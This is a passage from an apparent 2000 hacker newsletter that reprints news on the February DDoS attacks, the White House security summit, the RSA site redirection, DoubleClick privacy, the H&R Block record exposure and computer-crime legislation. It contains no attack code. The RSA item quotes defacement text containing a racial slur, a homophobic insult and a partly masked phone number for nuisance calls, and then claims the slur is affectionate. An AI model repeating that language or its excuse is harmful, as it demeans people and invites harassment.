small number of the shares in BB #1 after the Stockholder's Meeting and buy a lot of BB #2 to get ready for BB #2's Stockholder's Meeting. You can rotate through a number of them. When you get what you want, you cash out. That's what big business would do. Gee, isn't that ironic, and a pretty good hack. One noteworthy point at this juncture would be to highlight the fact that investment clubs are regulated - they are not just informal groups of investors. There is paperwork that needs to be filed. For help starting up your own investment club, The Motley Fool (http://www.fool.com/) has lots of resources that may be of assistance. In particular, the "Investment Club" section of the Motley Fool may be of interest. Who knows, what you made the company do might please other stock investors and you might sell at a profit. But, what you've done could also hurt the company's image and cause the stock to go down. Ha! (This is where you've got to smile.) You will have BB's officers trying their hardest to not let the stock drop -- they're working in YOUR (a stockholder) best interests (actually they're trying to keep their stock options positive and they personally lose money if the stock drops). Isn't it funny, that while you fight for your cause, they can be fighting to not let you (a stockholder) lose any money! Now, that's justice! Well, that's the plan. Play the game - Hack life. Use the media, don't let them always use you. Don't just vent your displeasure on the talk-back, on-line magazines. Make a difference!. @HWA 44.0 HNN: Feb 15th: Suspects Sought in DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Amazing how this has made such big news, fix your routers boys!! - Ed contributed by janoVd According to unnamed ``sources familiar with the investigation'' the FBI is preparing to question at least two suspects. Coolio and mafiaboy may soon be subjected to FBI interrogation. (There is very little in the way of confirmable information in this article. Please take that into account when reading it.) Washington Post http://www.washingtonpost.com/wp-dyn/business/A51397-2000Feb14.html By Ariana Eunjung Cha and John Schwartz Washington Post Staff Writers Tuesday, February 15, 2000; Page E1 Federal agents chasing the hackers who brought down a string of high-profile Web sites are preparing to question several suspects in the case, sources familiar with the investigation said yesterday. One of those people, "Coolio," is located in the United States, the sources said. That is also the name used by a person who early Sunday defaced a company Web site for one of the most trusted names in the security business. A second is allegedly a Canadian teen known online as "mafiaboy." And a third is a male who allegedly "confessed" to a staff member of the popular security site Attrition.org. Law enforcement officials and independent cyber-sleuths have been able to link the online aliases to real names and addresses, and FBI agents are expected to begin questioning them as early as today. Meanwhile, representatives of some of the biggest high-tech businesses are scheduled to gather at the White House at 11 a.m. The companies have agreed to jointly call for a voluntary, industry-led coalition that will share information on cyber-attacks and how to respond to them--a step that security experts hailed as critical to discouraging future attacks. The person suspected of mounting the first attacks was named in a three-page e-mail sent to FBI agents late Wednesday by two computer experts, David Brumley of Stanford University and Joel de la Garza of Securify.com, a security company. The two men analyzed the log files from several of the recent "denial of service" attacks--which involved bombarding Web sites with so many requests for information that legitimate users were effectively shut out--and traced them back to a single individual. Brumley, a 24-year-old security administrator for the school, says they were able to quickly discover the person's online alias and his physical location down to the city. He said the attacker appeared to have significantly modified programs that are widely available on the Internet. "I think this guy is more sophisticated than a script-kiddie," Brumley said yesterday. "But he's not a computer-science genius. . . . Chances are it's someone who is either in college and has taken several computer-science classes or is a professional in the industry. We are seeing that the guy knows what he's doing." Brumley also said his analysis shows that it's likely that the attacks--which in addition to Yahoo and eBay hit sites including Amazon.com, CNN.com and Buy.com--were carried out by at least two groups because they used different strategies. Still, other experts point out that some popular attack programs often mix the two attack strategies because each exploits different vulnerabilities in a network. Indeed, company officials have said ZDNet and Buy.com were hit by both types of attacks simultaneously. This weekend, hackers manipulated an entry in a database that matches Internet addresses to their legitimate home pages so that www.rsa.com--the main page for RSA Security, a leader in the encryption business--would point to a mock site in the South American country of Colombia. The dummy page contained the words "Owned by Coolio" and linked to a recent RSA press release, "RSA Laboratories Unveils Innovative Countermeasure To Recent 'Denial of Service' Hacker Attacks." The second potential suspect--"mafiaboy"--is likely a copycat attacker, according to Michael Lyle of Recourse Technologies Inc. in Palo Alto, Calif. Last week, mafiaboy showed up on one of the many Internet Relay Chat channels frequented by hackers and sparred with the other visitors. "We entered into a number of conversations with mafiaboy and we saw him asking for suggestions on what sites to attack and after someone would suggest a site, that site would go down," Lyle said. Lyle declined to provide the log files for his conversations with the alleged hacker but another person investigating mafiaboy's connection to the attacks offered a brief transcript. Making a bilingual play on the word "packet"--the term for the uniform chunks of information that computers on the Internet break data into for sending--the hacker joked about being rumored to be the "Canadian pacquet monkey" and that he was responsible for paralyzing some of the high-profile sites. He mused profanely about how heavily the discussion might be monitored and said "better stop talkin . . . say nothing, know nothing, be nowhere." -------------------------------------------------------------------------------- A third possible attacker being investigated by the FBI is a male who has engaged the people in Attrition.org in e-mail messages and chats and bragged about his victories, the sources said. In e-mail sent last week to one of the people who run the site, the hacker states: "If you notice the targets, They are all PUBLICLY traded companies, This was an attempt to put a 'Scare' into internet stock holders, Also, Attacks WILL be carried out against Online trading companies, Dow, Onlinetrade, E-Trade, etc." Brian Martin, an independent security expert, said that, historically, multiple groups have been involved in high-profile cyber-crimes. "Copycatting and copying style is very common," he said. A source involved in the federal investigation declined to say whether any suspect was under special scrutiny but said: "It is fair to say we're tracking down anyone taking credit for it." Law enforcement officials cautioned, however, that their intention to interview the people who have emerged in the investigation does not mean they are necessarily solid suspects in the case. Attorney General Janet Reno and FBI Director Louis J. Freeh are scheduled to appear before Congress tomorrow to discuss the hacker case and the overall problem of computer crime and cyber-terrorism. Meanwhile, one law enforcement official cautioned yesterday that authorities don't expect to complete the hacker probe any time soon and are "planning for a long investigation." Rloxley, a "white hat" hacker who maintains the "hackphreak" channel on Internet Relay Chat, scoffed at the notion that "mafiaboy" could pull off such an ambitious series of attacks: "Mafiaboy wishes that it was mafiaboy." The rush by some companies to capitalize on publicity and service as a result of the attacks--especially security firms attempting to find and reveal the hacker--has some observers worried. "We're seeing companies with no investigative background going to the press even before they go to the police! It would be a shame to see someone not get caught because the security companies are trying to one-up each other," said John Vranesevich, who owns the hacker-tracking AntiOnline site. The text of the joint statement by high-tech companies steers away from any proposal that might be cause for overly invasive monitoring of the nation's computer networks by law enforcement, but it recalls the efforts undertaken by industry to meet the challenge of the Y2K problem. Many in the business community say the Y2K fix-up effort was a model of the kind of public-private partnership that could be effectively applied to computer security. According to one participant in the planning of the event, the Clinton administration will make similar recommendations. Some Internet security experts, however, suggested that today's summit will not deliver much. "I think it is mostly harmless," said Sean Donelan, a former researcher at AT&T Laboratories now at California-based Equinix. Donelan noted that the attendees are largely corporate types and not techies: "They'll have their pictures taken, and more than likely the government officials won't even stay for the whole meeting. The White House probably doesn't have enough power outlets if everyone brought their laptop," he joked. Staff writer David A. Vise contributed to this report. (c) 2000 The Washington Post Company @HWA 45.0 HNN:Feb 15th:Hackers Invited to Summit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by janoVd 20 executives from technology companies, as well as academics and officials from the National Security Agency, were invited to attend a technology summit with President Clinton. The summit hopes to look at ways to tighten security on the World Wide Web. One of the invites is Mudge, hacker from the security consulting company @Stake. Associated Press - via Boston Globe http://www.boston.com/dailynews/046/economy/Clinton_taking_up_Web_security:.shtml (404) @HWA 46.0 HNN:Feb 15th:Stacheldraht Author Retires ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by randomizer The author of the DDoS tool Stacheldraht, Randomizer, told HNN today that he will not continue his work in the field and will not start developing on the next version of Stacheldraht called Blitzkrieg. "All that media hype is too much for me. I do not want to be the scapegoat for the security agencies, only cause some people abuse the tools I wrote." Randomizer said on early Tuesday. He indicated that he wants now to focus more on his "real life". Heise - German http://www.heise.de/newsticker/data/pab-15.02.00-000/ @HWA 47.0 HNN:Feb 15th:CNN News Chat with Clinton Compromised? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by cult hero In an email statement to the White House CNN News admitted that someone was able to bypass the filters they had put in place for an online chat with the President. The presidential impostor then said "Personally, I'd like to see more porn on the Internet, Wolf how about you?" in response to a question about Clinton's thoughts on the Internet. Fox news has labeled the incident a prank and has refused to say that they were hacked. (Sounds like a simple net split, doesn't even rank as a prank.) Fox News http://www.foxnews.com/vtech/021400/hack.sml (404) @HWA 48.0 HNN:Feb 15th:RSA Web Page Redirected ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Encryption security firm RSA had an older web page redirected to a site calling for more lax export controls on encryption products. It would appear that RSA did not even have password authentication set up on its DNS entries. ZDNet http://www.zdnet.com/zdnn/stories/news/0,4586,2437384,00.html The Register http://www.theregister.co.uk/000214-000025.html RSA Security site defaced Computer criminals, keen to make a point about the insecurity of Domain Name System authentication, hit an older site maintained by the network security provider. By Will Knight, ZDNet (UK) February 14, 2000 11:21 AM PT Another Web attack, this time on encryption security firm RSA. Computer security firm RSA Security Inc. (Nasdaq: RSAS) had one of its Web sites effectively defaced by computer criminals apparently keen to make a point about the insecurity of DNS (Domain Name System) authentication. The affected site is an older RSA site, not its primary home page. According to security and encryption expert Brian Galdman, the culprits appear to have gained access to a high-level DNS server rather than broken into the server that hold the page itself. This latest high-profile attack adds to the argument that, as illustrated by the recent spate of distributed denial-of-service attacks, there remain major security issues -- even for the best-equipped Web sites. Pointer page defaced By noon on Monday, http://www.rsa.com led to a defaced page with a virtually incoherent message. However, the server on which the Web site exists hasn't been hacked: The domain name simply points to another IP address. A spokesman for RSA said that http://www.rsa.com is RSA Security's old Web site, which is maintained as "a pointer" to the official Web site at http://www.rsasecurity.com. Although hacks on DNS servers aren't unknown, Galdman said the problem points to more serious issues with the Internet's infrastructure. He said that if these malicious computer hackers have access to enough DNS servers they could, in theory at least, "take down the whole Internet." The target is probably no coincidence, Galdman said. Attacking a firm specializing in encryption may illustrate dissatisfaction with the U.S. government for restricting access to strong encryption, he said. "This shows the extreme folly of the U.S. government, in particular, in preventing technology that would prevent this sort of attack being deployed. They're making the point that they're not secure. Hopefully, someone will start asking why they're not." The RSA site has now been pulled down. A company spokesman said it will be about 24 hours before it goes live again. Several groups have proposed a more secure form of DNS, but none has yet been implemented. For example, RFC 2137, first proposed in April 1997, outlines a method to use digital signatures to ensure that only authorized persons can update a DNS record. -=- Posted 14/02/2000 7:37pm by Thomas C. Greene in Washington Internet security firm RSA's Web site hacked RSA Security has suffered the embarrassment of having its home page "defaced" by an intruder. The original defaced page can be found at http://www.2600.com/hacked_pages/2000/02/www.rsa.com/ Now it get's complicated: there is a second defaced RSA home page, in which the company's site appears to be "owned" by the an intruder. This is a plain white page bearing a simple message. However, the IP address of RSA.com (205.181.76.22) and the IP address of the second "hacked" page (200.24.19.252) -- are not the same. The hacked page, a computer security firm employee writes, is on a "computer in the University of Antigua - (http://bachue.udea.edu.co/). So what happened? One theory put forward by a very knowledgeable reader is that "the nameserver was hacked and the www.rsa.com IP forwarded to another hacked box which was used to host the defaced page. This box must have been hacked again, by someone else and a new page put up". The Register found the following text on the new defaced page (we've deleted part of the phone number for obvious reasons), "Wat up whats up to all my nigs ya know who ya are n #2600 and whats up all my #sesame nigs and call rigger if ya come here bc he is the gayest fuck ;) 718-815-**** all chans are on a irc server lol -tek pBK > * also irc.segments.org ;)" For those not fluent in h4x0r dialect, the gentleman or lady who hacked the RSA page wishes to offer warm salutations to all of his or her colleagues from the IRC channels #2600 and #sesame, and further invites all concerned to place nuisance phone calls to a gentleman or lady known as rigger ( a notorious hacker, apparently) , either as a friendly prank, or for malicious purposes. The overall tone suggests the former is intended. Additionally, we note that "nigs" should not be construed to express any racist sentiments, but is best understood as a term of fraternal affection along lines expressed by the familiar "homies". In the interests of investigative journalism we visited the #2600 and #sesame channels on irc.segments.org, following the message's reference to that network, but found ourselves alone with a bot which advised us, "Welcome to #2600 sit down and shuddup or fear a nice /kill or /kline." A subsequent visit to the same two channels on the more h4x0r-friendly efnet.org yielded the expected result, two rooms chock full of quiet, paranoid hackers and eager, chatty wannabes. No one volunteered any information which The Register felt was up to its impeccable standards of journalistic dependability, so we must refrain from passing along speculation proffered by anonymous strangers. The hack follows closely on the heels of RSA's boastful announcement last week that it was developing some new magic bullet to thwart DDoS attacks. The idea behind it is clever, we must allow: a cryptographic technique using so-called "client puzzles" which would accompany connection requests. "During an attack, legitimate clients would experience only a small degradation in connection time, while the attacking party would require vast computational resources to sustain an interruption of service. As a result, the subsequent burden of numerous requests placed back on the attacking party would severely limit its ability to continue the attack," RSA says. Of course the selection of RSA's home page for a graffiti attack could be a mere coincidence, or it could be a reply from the hacking underground meant to remind the company, and the rest of us by extension, that, all boasting aside, if you are connected to the Internet, you can be hacked, one way or another. A worthwhile reminder for all of us, we must add. � (Its articles like this one from The Register that make me sure that archiving this material is a worthy cause, its priceless ... ;) - Ed ) @HWA 49.0 HNN:Feb 15th:Doubleclick Announces New Privacy Plan ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Joey Based in New York DoubleClick is the nation's largest Internet ad agency, electronically inserting advertisements on about 1,500 Web sites. Last fall the company bought direct-marketing company Abacus for $1.7 billion, and recently started to cross-reference information obtained by cookies with consumer information from the Abacus marketing database. DoubleClick has now unveiled an advertising campaign that attempts to portray itself as a consumer-friendly company that goes out of its way to protect consumers' privacy. The company will place 50 million banner advertisements on Web sites, and retain PricewaterhouseCoopers to start independent audits of its privacy practices. However they will continue to match surfing habits with purchasing decisions. Associated Press - via Detroit Free Press http://www.freep.com/business/web15_20000215.htm Ad firm fuels debate over Web privacy DoubleClick says it does not spread consumers' data February 15, 2000 ASSOCIATED PRESS On-line advertising agency DoubleClick launched a counterattack Monday against repeated accusations that it invades consumers' privacy on the Internet, but the effort exacerbated a clash with privacy advocates seeking a government clampdown. The widened rift underscores the increasing controversy between a marketing industry eager to harness the Internet's power to reach customers and those who fear the intrusion to people's confidential information, such as spending habits, health status and product preferences. New York-based DoubleClick is the nation's largest Internet ad agency, electronically inserting advertisements on about 1,500 Web sites. But last fall the company bought direct-marketing company Abacus for $1.7 billion, irking privacy advocates with plans to cross-reference information obtained by Web "cookies" with consumer information from the Abacus marketing database. A cookie is a small file a Web site deposits on your hard drive, often with a number that identifies the user's computer. The next time someone using that computer goes back to the site, the site recognizes the computer. DoubleClick, targeted in a lawsuit filed last month and a complaint filed with the Federal Trade Commission last week, is accused of seeking to build virtual dossiers on unwitting consumers' buying habits and identities, with the intent to sell the data to advertisers who can barrage people with ads. DoubleClick fought back Monday, unveiling an advertising campaign that attempts to portray itself as a consumer-friendly company that goes out of its way to protect consumers' privacy. Measures include placing 50 million banner advertisements on Web sites, making it easier for Web users to opt out of giving marketers confidential details about their shopping habits. DoubleClick also said that PricewaterhouseCoopers would start independent audits of its privacy practices. Yet, privacy advocates immediately termed the DoubleClick effort window dressing, saying it avoids the main issue: linking information users believed was anonymous with a database of names and consumer buying habits. The Electronic Privacy Information Center, an advocacy group in Washington, filed the complaint with the FTC. The group also is pushing for federal legislation that would regulate the use of personal information and cookies on the Internet. The conflict puts DoubleClick at the vortex of a wider debate over how far businesses should go to target consumers. @HWA 50.0 HNN:Feb 16th:UCITA Passes In Virginia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Erik The Virginia House of Delegates on Monday unanimously passed Uniform Computer Information Transactions Act. Among other things UCITA allows software companies to 'repossess' software or to turn it off remotely. (What is surprising is that it passed unanimously. Do AOL and other software companies have that much influence in VA?) InfoWorld http://www.infoworld.com/articles/ec/xml/00/02/14/000214ecucita.xml (*yawnfest*, dry reading, for article follow link... - Ed) @HWA 51.0 HNN:Feb 16th:Read Our Lips: No New Net Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by janoVd Executives from the nation's leading Internet companies told President Clinton at the White House yesterday that despite a perceived increase in Internet related crime, they saw no need for an increase in government regulation of the industry. (YEAH!) NY Times http://www.nytimes.com/library/tech/00/02/biztech/articles/16net.html (Pay to play site, anyone have an account here?) CNN http://www.cnn.com/2000/TECH/computing/02/15/hacker.security/ Clinton fights hackers, with a hacker February 15, 2000 Web posted at: 1:51 p.m. EST (1851 GMT) From staff and wire reports WASHINGTON -- Searching for ways to improve security on the Internet, President Bill Clinton convened a meeting at the White House on Tuesday with technology experts that included a hacker named Mudge. Saying security on the Internet should be improved without jeopardizing the entrepreneurial potential of e-commerce, the president endorsed a $9 million proposal to create a high-tech security institute. "We know we have to keep cyberspace open and free," Clinton said. "At the same time, computer networks (must be) more secure and resilient and we have to do more to protect privacy and civil liberties." The meeting follows a blizzard of assaults last week that disabled some of the nation's most popular Web sites, among them CNN.com, eBay, Yahoo, Amazon.com and E*Trade. Republican lawmakers have criticized related Clinton proposals in the past, saying they have not done enough to protect federal computer systems. But U.S. Secretary of Commerce William Daley, who took part in the session, said the U.S. government can "lead by example" to ensure national networks are secure. "The tools are out there, but not many companies are taking advantage of them. We in government can provide an example by getting our own house in order," he told reporters. Sun, MCI, IBM and Mudge The president invited more than a dozen computer executives and academics who specialize in computer technology to the session. Companies represented included America Online, Yahoo!, 3Com, Cisco Systems, Sun Microsystems, MCI Worldcom, IBM, AT&T, Hewlett Packard, Intel and Microsoft, said White House spokesman Joe Lockhart. Among the participants was Mudge, nickname for a member of a "think tank" of hackers who perform security consulting under the name @Stake. The White House released a list of participants that included an @Stake representative named Peiter Zatko. Mudge, in a business suit with his long brown hair hanging down on his chest, sat quietly with his fingers interlocked atop his blue briefing books. He is also a member of the celebrated hacker group L0pht Heavy Industries, based in Massachusetts. Another participant, Whitfield Diffie of Sun Microsystems, set up his laptop on the conference table, an agenda on the screen. No 'electronic Pearl Harbor' The initial idea of the meeting was to address the problem of terrorists using cyberspace. But Clinton said the attacks last week underscore a need for the government to focus on protecting the Internet itself. "These denial-of-service attacks are obviously very disturbing and I think there is a way that we can clearly promote security," Clinton told CNN.com Monday in an online interview. But Tuesday he cautioned that the attacks were not an "electronic Pearl Harbor." "I don't think we should leave here with this vast sense of insecurity," Clinton said at the Tuesday meeting. "We ought to leave here with a sense of confidence that this is a challenge that was entirely predictable. It's part of the price of the success of the Internet." Summit also tackles cyberterrorism Lockhart said beforehand that the participants mainly would review Clinton's $2 billion proposal for protecting the nation's computer infrastructure from sabotage; about $91 million of that would go toward addressing cyberterrorism. "The meeting is not to come out with new budget numbers or detailed policy initiatives. It's to make sure we are on the right track," Lockhart said. "One of the goals the president has is to make sure that each of these important companies is talking within their industry about what they can do." One challenge for vulnerable companies is how to share warnings on attacks without causing undue panic or releasing corporate secrets. Managers of a recently formed private security network for banks said computer experts at some of the nation's largest financial institutions received detailed warnings of impending threats days before last week's attacks began on major sites. Hacking warnings not passed to FBI But banking officials never passed those warnings to the FBI or other law enforcement agencies, because they weren't allowed to do so under rules of the unusual security arrangement, formed with the government's encouragement. To encourage open participation by banks and other financial firms, the Treasury Department decided that information disclosed within such a network would not be turned over to federal regulators or law enforcement agencies. It worked well for the banks that were forewarned about the attacks last week but the system also ensured the same warnings were not widely distributed. The banking network issued the first alert in the latest attacks on February 4, "when we started seeing certain machines being compromised," said William Marlow of Global Integrity Corp., which runs the network. Yahoo! was attacked four days later. America Online is awaiting approval of a merger with Time-Warner, the parent company of CNN. Correspondents Steve Young, Major Garrett and The Associated Press contributed to this report. @HWA 52.0 HNN: Feb 16th:Tax Returns Inadvertently Made Public ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse H&R Block's online tax filing service exposed at least 50 people's sensitive financial records to other customers last weekend, prompting the company to shut down the system yesterday afternoon. H&R Block said that the glitch only effected web filers and that the system would remain offline until it was fixed. C|Net http://news.cnet.com/news/0-1005-200-1550948.html Breach exposes H&R Block customers' tax records By Courtney Macavinta Staff Writer, CNET News.com February 15, 2000, 7:10 p.m. PT H&R Block's online tax filing service exposed some customers' sensitive financial records to other customers last weekend, prompting the company to shut down the system yesterday afternoon, CNET News.com has learned. The company's Web-based tax preparation service, which is the premier sponsor of Yahoo's Tax Center, experienced a technical glitch that accidentally switched some tax filers' records, H&R Block confirmed today. As a result, when some registered users signed on to the service to work on their tax returns, they instead received someone else's filing--including a social security number, home address, annual income and other highly sensitive information. "What we discovered was that some of our clients' data was appearing in other clients' data files," said Linda McDougall, vice president of communications for H&R Block. "We're keeping it down until we're convinced that the problem has been corrected." McDougall emphasized that the problem only affected the Web-based preparation and filing of returns. Taxes processed with H&R Block's preparation software or at one of the company's offices were not exposed, she said. The software glitch revealed the confidential records of at least 50 people, although the full extent of the problem will not be known until the company completes an internal audit, McDougall said. She added that at least 10 customers have contacted the company about the problem. "Once we determined this, we took our system offline immediately and we began an audit of our entire customer database," McDougall said. "We're confident that it wasn't due to a hacker--we feel that it was a software problem within our system," she added. "No return has been filed to the Internal Revenue Service that contains inaccurate data." This is the second time in two weeks that H&R Block's $9.95 "Do-it-yourself" Net filing service--which more than 300,000 people have used so far this year--has suffered a technical problem and had to be shut down. H&R Block expects to handle more than 650,000 returns via the Net this year. Other Web sites also have had security concerns in recent months. For example, RealNames, a company that substitutes complicated Web addresses with simple keywords, warned its users last week that its customer database had been hacked, and that user credit card numbers and passwords may have been accessed. The H&R Block privacy breach was no doubt startling to some users who chose the 40-year-old company over other online services, such as Intuit's TurboTax software. User anxiety was intensified because it occurred on the weekend, making it difficult to locate an H&R Block employee who could address the problem. Joshua Kasteler of the San Francisco Bay area said he was tackling his EZ 1040 on Sunday when the H&R Block system started to act sluggish. Kasteler logged off, and when he signed on to the password-protected site an hour later, he was given access to the records of another H&R Block customer. "Instead of my information, it was a gentleman from Texas who worked for Advanced Micro Devices," Kasteler said, noting that the forms also listed the other person's phone number, address, social security number and annual income. "I assumed that someone else has my information, too, because this guy's information fell into my lap. I had this guy's life." Kasteler said he emailed and called H&R Block but still had not heard back from the firm as of late today. So he decided to call the man whose information he had accessed: James Keech, a maintenance technician who also had trouble with the H&R Block site and had been unable to process his return since Thursday. "When (Kasteler) called, I was freaking," Keech said. "I was like, 'If he's got it, how many other people have my file and aren't being honest and letting me know.' " Keech said he called H&R Block and was told that there had been a security problem. He has asked that his data be deleted from the system. "I'll probably go to a regular tax filing office now," he said. "It would have been easier to fill it out on paper." The 1040 EZ is a simplified IRS form that does not include information such as itemized deductions, capital gains or rental income. H&R Block's privacy policy states that "information contained in your tax return will be treated with extreme care and confidence...we will never disclose any tax return information without your consent." Like many Web sites, however, the policy doesn't address information that is accidentally disclosed without permission. With the growth of the Net, consumer advocates have been pushing for umbrella data-protection laws to safeguard U.S. computer users, who may be giving up more information in the digital age that makes them vulnerable to fraud and privacy breaches. @HWA 53.0 HNN:Feb 16th:AOL Intruder Sentence Increased ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Erik When Jay Satiro was sentenced for intruding into AOL computer systems last December his sentence banned him from computer use but left exceptions for employment and education uses. Judge John Perone has now removed those exceptions, and has ordered his mother to use a portable computer that can be locked up away from Mr. Satiro. (Just how the hell is this guy expected to contribute to society if he can not even touch a computer?) NY Times http://www.nytimes.com/aponline/f/AP-AOL-Hacked.html (pay to play...) @HWA 54.0 HNN:Feb 16th:China Denies Defacing Japanese Sites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Foreign Ministry officials in China have said that there is no way to confirm that recent attacks on various Japanese web sites have originated in China. Officials have reaffirmed their opposition of such behavior Reuters - via Excite http://news.excite.com/news/r/000215/05/net-japan-hackers (Server: "We're sorry, but this story is not currently available" -Ed ) @HWA 55.0 HNN:Feb 16th:Tulsa Police Break Up Online 'Gang' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Anonymous Police in Tulsa, Oklahoma have raided two area youngsters who are believed to have stolen credit card numbers and crashed two Oklahoma web sites. After the information on the confiscated equipment is analyzed arrests may be made. KOTV http://www.kotv.com/pages/viewpage.asp?id=3182 @HWA 56.0 HNN:Feb 17th:Feds still nvestigating ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by ben In the classic slow style of the US Government, federal law enforcement officials are still investigating last week's denial of service attacks. Sources close to the investigation have said that they are following "very strong leads". The names of mafiaboy, coolio, and machoman have been mentioned in numerous media outlets but no hard evidence yet links them to the crimes. Associated Press - via Excite http://news.excite.com/news/ap/000216/17/news-hacker-attacks (unavailable...) CNN - video http://cnn.com/videoselect/# @HWA 57.0 HNN:Feb 17th:Correction: UCITA Did Not Pass In VA, Yet. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by White Vampire Yesterday HNN incorrectly reported that the Virginia Legislature passed into law the Uniform Computer Information Transactions Act. They did pass joint resolutions HJ277 and SJ239 which will create a joint subcommittee to study the UCITA and its language. Slashdot http://slashdot.org/comments.pl?sid=00/02/14/2221203&cid=378 Late Update 11:50 Well it would seem that interpreting legal jargon within the Sate legislature of Virgina is a little more difficult than first thought. It would now appear that UCITA did in fact make it into law by amedning title Title 59.1. But here, read it for yourself: House Bill 561: Creates the Uniform Computer Information Transactions Act (UCITA). UCITA was promulgated by the National Conference of Commissioners on Uniform State Laws (NCCUSL) Passed 95-2, 1 abstain. Senate Bill 372: Creates the Uniform Computer Information Transactions Act (UCITA). UCITA was promulgated by the National Conference of Commissioners on Uniform State Laws (NCCUSL). Passed 39-0 @HWA 58.0 HNN:Feb 17th:Defense Message System Has Serious Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench During operational tests of the $1.6 million Defense Message System software Version 2.1, an information warfare test team "was able to penetrate all but one test site with only a moderate level of effort," according to the DOD's 1999 annual OT&E report, released this week. The test was conducted last year by the Defense Department's Office of Operational Test and Evaluation, As a result of the failure, the Pentagon's OT&E director concluded that DMS Version 2.1 was "not operationally effective." Federal Computer Week http://www.fcw.com/fcw/articles/2000/0214/web-dms-02-16-00.asp DMS security cracked during testing BY Daniel Verton 02/16/2000 Information warfare tests conducted in September 1999 on the Pentagon's $1.6 billion Defense Message System found serious deficiencies in the system's security protections. During operational tests of DMS software Version 2.1, conducted last year by the Defense Department's Office of Operational Test and Evaluation, an information warfare test team "was able to penetrate all but one test site with only a moderate level of effort," according to the DOD's 1999 annual OT&E report, released this week. As a result of the failure, the Pentagon's OT&E director concluded that DMS Version 2.1 was "not operationally effective." DMS was scheduled to replace the Pentagon's aging Automatic Digital Network (Autodin) message system at the end of last year. Developed in the 1960s, Autodin passes message traffic through a global network of highly secure but antiquated mainframes that use tape reels for data storage. Plans for DMS deployment include installing the software on more than 360,000 desktops at more than 7,000 locations throughout the department. According to the report, the inability of system administrators to adequately set up and configure DMS software securely led to gaps in network security that were easily breached. Evaluators also blamed the problem on the complexity of the software. "The underlying factors are the complexity of DMS, the need to reconfigure DMS to integrate it with each distant site's supporting architecture and the lack of automated aids to check DMS security posture once it is installed or after it is reconfigured," the report stated. @HWA 59.0 HNN:Feb 17th:CIA Startup Works on Net Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench In-Q-Tel, the CIA's recently formed venture capital fund, has entered into a $3 million contract with Science Applications International Corp. (SAIC) for development of software designed to protect Web sites against DoS attacks and to make computer addresses invisible to sniffers. Washington Post http://search.washingtonpost.com/wp-srv/WPlate/2000-02/16/106l-021600-idx.html (404) @HWA 60.0 HNN:Feb 20th:Bill Will Double Title 18 Penalties ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Sen. Kay Bailey Hutchison, R-Texas will be introducing a bill next week that will alter Title 18 of the US Criminal Code to double the current five-year penalty for engaging in "fraud or related activity in connection with computers." The bill will also create the establishment of a National Commission on Cyber security, which would be given six months to present findings on protecting computers from malicious attacks. (Show me one case where increased penalties would have made a difference.) Computer Currents http://www.currents.net/newstoday/00/02/17/news4.html News Story Bill To Double Hacker Sentences By: Robert MacMillan, Newsbytes. February 17, 2000 URL: http://www.currents.net/newstoday/00/02/17/news4.html Penalties for malicious hackers who crack private computers would double if Sen. Kay Bailey Hutchison, R-Texas, can move her new bill successfully through the Senate. Hutchison next week is expected to introduce legislation that would alter Title 18 of the US Criminal Code to increase double the current five-year penalty for engaging in "fraud or related activity in connection with computers." Hacking penalties would increase from five to 10 years for the first offense, and from 10 to 20 years for the second offense. The legislation also would establish a National Commission on Cybersecurity, which would be given six months to present findings on protecting computers in the Internet age from wired misappropriation. Hutchison's legislation, along with a planned measure announced in a Senate subcommittee today by House Judiciary Committee Ranking Member Patrick Leahy, D-Vt., represents two of the initial congressional responses to the spate of denial-of-service attacks that took down several well-known Web sites last week. "Current law treats computer hackers like harmless 'thrill seekers' when in reality they are reckless drivers on the information superhighway," Hutchison said. "It is clear they now have the capability to disrupt service to millions of Americans and cause countless dollars in damages to US business." Hutchison's bill, a spokesperson told Newsbytes, likely will establish monetary penalties based on the amount of damage done to corporate Websites, but also would figure in "pain and suffering-style" costs for the amount of damage to the public caused by cracks and other kinds of computer assaults. "When you define damage...it might be a little unclear," the spokesman said, using a hypothetical example of eBay and $5,000. "Did it cost eBay $5,000 to simply fix the service outage, versus 'Did we lose $5,000 in lost opportunities, market capitalization and customer dissatisfaction?'" Hutchison has been active in several other high-tech legislative initiatives, including the introduction of S. 1660 in September 1999, a bill that establishes cyberstalking penalties. That bill is awaiting a hearing in the Senate Judiciary Committee, while a mirror version of the bill 